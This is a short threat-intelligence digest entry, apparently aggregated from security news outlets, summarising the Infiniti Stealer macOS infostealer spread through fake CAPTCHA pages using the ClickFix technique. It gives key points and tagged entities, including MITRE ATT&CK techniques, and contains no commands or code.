Infiniti Stealer Malware Distributed via Fake CAPTCHA Pages on macOS

Severity: Medium (Score: 57.0)

Sources: Cybersecuritynews, Bleepingcomputer, Scworld, Gbhackers, Securityaffairs.Co

Summary

Infiniti Stealer, a newly identified macOS infostealer, is being disseminated through fraudulent Cloudflare-style CAPTCHA pages. This malware employs social engineering tactics, specifically a method known as ClickFix, to deceive users into executing harmful commands on their systems. The attack circumvents traditional software vulnerabilities, posing a significant risk to Apple users. The malware was initially tracked as 'NukeChain' before its true nature was revealed when its operator panel became publicly accessible. The scope of the attack appears to be widespread, targeting macOS systems without requiring prior vulnerabilities. Currently, there are no specific CVEs associated with this malware, and its operational status remains active. Security professionals are urged to remain vigilant against this evolving threat. Key Points: • Infiniti Stealer is distributed via fake Cloudflare CAPTCHA pages targeting macOS users. • The malware uses social engineering tactics, specifically ClickFix, to execute commands. • No specific CVEs are associated with this malware, indicating a novel attack vector.

Key Entities

• Silver Fox (apt_group)
• Malware (attack_type)
• Phishing (attack_type)
• Financial (industry)
• Infiniti Stealer (malware)
• NukeChain (malware)
• T1059.004 - Unix Shell (mitre_attack)
• T1059.006 - Python (mitre_attack)
• T1059 - Command and Scripting Interpreter (mitre_attack)
• T1071 - Application Layer Protocol (mitre_attack)
• T1567.002 - Exfiltration to Cloud Storage (mitre_attack)
• MacOS (platform)
• Windows (platform)
• Any.run (platform)
• VirtualBox (platform)
• Hybrid Analysis (tool)
• Joe Sandbox (tool)
• VMware (tool)